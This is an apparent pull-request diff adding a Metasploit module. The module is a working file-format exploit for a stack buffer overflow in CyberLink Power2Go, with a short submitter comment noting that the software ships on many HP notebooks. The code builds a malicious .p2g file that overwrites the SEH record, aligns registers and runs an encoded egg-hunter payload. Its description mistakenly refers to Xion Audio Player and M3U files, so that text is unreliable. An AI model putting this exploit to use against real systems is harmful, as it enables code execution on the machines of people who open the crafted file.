exploit for cyberlinks Power2Go application. I find this software installed by default on alot of HP notebooks along with the CD installer. Not quite sure this was exploited earlier..

modules/exploits/windows/fileformat/cyberlink_p2g_bof.rb

@@ -0,0 +1,116 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+# http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = GreatRanking
+
+	include Msf::Exploit::FILEFORMAT
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'		=> 'CyberLink Power2Go name attribute (.p2g) Stack Buffer Overflow Exploit',
+			'Description' 	=> %q{
+					This module exploits a stack buffer overflow in Xion Audio Player prior to version
+				1.0.126. The vulnerability is triggered when opening a malformed M3U file that
+				contains an overly long string. This results in overwriting a
+				structured exception handler record.
+			},
+			'License'	=> MSF_LICENSE,
+			'Version'	=> "$Revision$",
+			'Author'	=>
+				[
+					'modpr0be <modpr0be[at]spentera.com>',    # initial discovery
+					'mr_me <steventhomasseeley[at]gmail.com>' # msf module
+				],
+			'References'     =>
+				[
+					['OSVDB', '70600'],
+					['URL', 'http://www.exploit-db.com/exploits/18220']
+				],
+			'DefaultOptions' =>
+				{
+					'EXITFUNC' => 'process',
+					'InitialAutoRunScript' => 'migrate -f',
+				},
+			'Payload'	=>
+				{
+					'Space'    => 1024,
+					'BadChars' => "\x00",
+				},
+			'Platform'	=> 'win',
+			'Targets'	=>
+				[
+					# Power2Go8.exe (0x004b0028) - pop esi/pop ebp/pop ebx/add esp,10/retn
+					[ 'CyberLink Power2Go 8 (XP/Vista/win7) XP Universal', { 'Ret' => "\x28\x4b" } ]
+				],
+			'DisclosureDate' => 'Sep 12 2011',
+			'DefaultTarget'	=> 0))
+
+		register_options(
+			[
+				OptString.new('FILENAME', [ false, 'The output filename.', 'msf.p2g'])
+			], self.class)
+	end
+
+	def get_payload(hunter)
+		
+		[ 'x86/alpha_mixed', 'x86/unicode_mixed' ].each { |name|
+			enc = framework.encoders.create(name)
+			if name =~ /unicode/
+				enc.datastore.import_options_from_hash({ 'BufferRegister' => 'EAX' })
+			else
+				enc.datastore.import_options_from_hash({ 'BufferRegister' => 'EDX' })
+			end
+			# NOTE: we already eliminated badchars
+			hunter = enc.encode(hunter, nil, nil, platform)
+			if name =~/alpha/
+				#insert getpc_stub & align EDX, unicode encoder friendly.
+				#Hardcoded stub is not an issue here because it gets encoded anyway
+				getpc_stub = "\x89\xe1\xdb\xcc\xd9\x71\xf4\x5a\x83\xc2\x41\x83\xea\x35"
+				hunter = getpc_stub + hunter
+			end
+		}
+
+		return hunter
+	end
+
+	def exploit
+
+		title = rand_text_alpha(10)
+		buffer = ""
+		buffer << "\x41" * 778
+		buffer << "\x58\x28"		# nseh
+		buffer << target['Ret']		# seh
+		buffer << "\x5f\x73" * 15		# pop edi/add [ebx],dh (after byte alignment)
+		buffer << "\x58\x73"		# pop eax/add [ebx],dh (after byte alignment)
+		buffer << "\x40\x73" * 3		# inc eax/add [ebx],dh (after byte alignment)
+		buffer << "\x40"		# inc eax
+		buffer << "\x73\x42" * 337		# add [ebx],dh/pop edx (after byte alignment)
+		buffer << "\x73"		# add [ebx],dh (after byte alignment)
+		buffer << get_payload(payload.encoded)
+
+		p2g_data = <<-EOS
+		<Project magic="#{title}" version="101">
+		<Information />
+			<Compilation>
+				<DataDisc>
+					<File name="#{buffer}" />
+				</DataDisc>
+			</Compilation>
+		</Project>
+		EOS
+
+		print_status("Creating '#{datastore['FILENAME']}' file ...")
+		file_create(p2g_data)
+	end
+end